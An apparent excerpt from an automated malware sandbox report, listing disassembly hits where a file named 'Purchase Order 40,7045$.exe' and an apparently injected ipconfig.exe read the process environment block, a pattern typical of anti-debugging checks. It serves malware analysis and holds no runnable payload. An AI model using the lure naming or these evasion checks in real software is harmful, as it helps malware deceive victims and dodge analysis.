Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0100A537 mov eax, dword ptr fs:[00000030h] 1_2_0100A537
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104E539 mov eax, dword ptr fs:[00000030h] 1_2_0104E539
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003540 mov eax, dword ptr fs:[00000030h] 1_2_01003540
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01033D40 mov eax, dword ptr fs:[00000030h] 1_2_01033D40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9849B mov eax, dword ptr fs:[00000030h] 1_2_00F9849B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA746D mov eax, dword ptr fs:[00000030h] 1_2_00FA746D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h] 1_2_010505AC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h] 1_2_010505AC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA44B mov eax, dword ptr fs:[00000030h] 1_2_00FBA44B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov ecx, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBBC2C mov eax, dword ptr fs:[00000030h] 1_2_00FBBC2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h] 1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h] 1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h] 1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h] 1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01038DF1 mov eax, dword ptr fs:[00000030h] 1_2_01038DF1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h] 1_2_0105740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h] 1_2_0105740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h] 1_2_0105740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h] 1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h] 1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h] 1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h] 1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00F9D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00F9D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00FB1DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00FB1DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00FB1DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h] 1_2_0101C450
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h] 1_2_0101C450
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB35A1 mov eax, dword ptr fs:[00000030h] 1_2_00FB35A1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h] 1_2_00FBFD9B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h] 1_2_00FBFD9B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h] 1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h] 1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h] 1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h] 1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h] 1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h] 1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h] 1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h] 1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h] 1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h] 1_2_00FAC577
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h] 1_2_00FAC577
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA7D50 mov eax, dword ptr fs:[00000030h] 1_2_00FA7D50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC3D43 mov eax, dword ptr fs:[00000030h] 1_2_00FC3D43
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h] 1_2_00FB4D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h] 1_2_00FB4D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h] 1_2_00FB4D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8AD30 mov eax, dword ptr fs:[00000030h] 1_2_00F8AD30
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h] 1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058CD6 mov eax, dword ptr fs:[00000030h] 1_2_01058CD6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h] 1_2_01006CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h] 1_2_01006CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h] 1_2_01006CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010414FB mov eax, dword ptr fs:[00000030h] 1_2_010414FB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105070D mov eax, dword ptr fs:[00000030h] 1_2_0105070D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105070D mov eax, dword ptr fs:[00000030h] 1_2_0105070D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h] 1_2_0101FF10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h] 1_2_0101FF10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB16E0 mov ecx, dword ptr fs:[00000030h] 1_2_00FB16E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F976E2 mov eax, dword ptr fs:[00000030h] 1_2_00F976E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB36CC mov eax, dword ptr fs:[00000030h] 1_2_00FB36CC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC8EC7 mov eax, dword ptr fs:[00000030h] 1_2_00FC8EC7
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058F6A mov eax, dword ptr fs:[00000030h] 1_2_01058F6A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h] 1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h] 1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h] 1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h] 1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h] 1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9766D mov eax, dword ptr fs:[00000030h] 1_2_00F9766D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007794 mov eax, dword ptr fs:[00000030h] 1_2_01007794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007794 mov eax, dword ptr fs:[00000030h] 1_2_01007794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007794 mov eax, dword ptr fs:[00000030h] 1_2_01007794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h] 1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h] 1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h] 1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h] 1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h] 1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h] 1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8E620 mov eax, dword ptr fs:[00000030h] 1_2_00F8E620
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h] 1_2_00FBA61C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h] 1_2_00FBA61C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h] 1_2_00F8C600
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h] 1_2_00F8C600
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h] 1_2_00F8C600
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB8E00 mov eax, dword ptr fs:[00000030h] 1_2_00FB8E00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC37F5 mov eax, dword ptr fs:[00000030h] 1_2_00FC37F5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041608 mov eax, dword ptr fs:[00000030h] 1_2_01041608
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103FE3F mov eax, dword ptr fs:[00000030h] 1_2_0103FE3F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h] 1_2_0104AE44
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h] 1_2_0104AE44
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F98794 mov eax, dword ptr fs:[00000030h] 1_2_00F98794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101FE87 mov eax, dword ptr fs:[00000030h] 1_2_0101FE87
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9FF60 mov eax, dword ptr fs:[00000030h] 1_2_00F9FF60
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h] 1_2_01050EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h] 1_2_01050EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h] 1_2_01050EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010046A7 mov eax, dword ptr fs:[00000030h] 1_2_010046A7
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9EF40 mov eax, dword ptr fs:[00000030h] 1_2_00F9EF40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103FEC0 mov eax, dword ptr fs:[00000030h] 1_2_0103FEC0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBE730 mov eax, dword ptr fs:[00000030h] 1_2_00FBE730
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058ED6 mov eax, dword ptr fs:[00000030h] 1_2_01058ED6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h] 1_2_00F84F2E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h] 1_2_00F84F2E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAF716 mov eax, dword ptr fs:[00000030h] 1_2_00FAF716
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h] 1_2_00FBA70E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h] 1_2_00FBA70E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA2AE4 mov eax, dword ptr fs:[00000030h] 5_2_02EA2AE4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA2ACB mov eax, dword ptr fs:[00000030h] 5_2_02EA2ACB
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h] 5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h] 5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h] 5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h] 5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h] 5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h] 5_2_02E8AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h] 5_2_02E8AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAFAB0 mov eax, dword ptr fs:[00000030h] 5_2_02EAFAB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h] 5_2_02EAD294
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h] 5_2_02EAD294
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB927A mov eax, dword ptr fs:[00000030h] 5_2_02EB927A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h] 5_2_02F2B260
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h] 5_2_02F2B260
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F48A62 mov eax, dword ptr fs:[00000030h] 5_2_02F48A62
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3EA55 mov eax, dword ptr fs:[00000030h] 5_2_02F3EA55
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h] 5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h] 5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h] 5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h] 5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F04257 mov eax, dword ptr fs:[00000030h] 5_2_02F04257
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h] 5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h] 5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h] 5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h] 5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h] 5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h] 5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h] 5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h] 5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h] 5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h] 5_2_02EB4A2C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h] 5_2_02EB4A2C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E88A0A mov eax, dword ptr fs:[00000030h] 5_2_02E88A0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h] 5_2_02F3AA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h] 5_2_02F3AA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h] 5_2_02E7AA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h] 5_2_02E7AA16
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E93A1C mov eax, dword ptr fs:[00000030h] 5_2_02E93A1C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h] 5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E75210 mov ecx, dword ptr fs:[00000030h] 5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h] 5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h] 5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9DBE9 mov eax, dword ptr fs:[00000030h] 5_2_02E9DBE9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h] 5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h] 5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h] 5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h] 5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h] 5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h] 5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h] 5_2_02EF53CA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h] 5_2_02EF53CA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h] 5_2_02EA4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h] 5_2_02EA4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h] 5_2_02EA4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F45BA5 mov eax, dword ptr fs:[00000030h] 5_2_02F45BA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h] 5_2_02E81B8F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h] 5_2_02E81B8F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F2D380 mov ecx, dword ptr fs:[00000030h] 5_2_02F2D380
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3138A mov eax, dword ptr fs:[00000030h] 5_2_02F3138A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAB390 mov eax, dword ptr fs:[00000030h] 5_2_02EAB390
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA2397 mov eax, dword ptr fs:[00000030h] 5_2_02EA2397
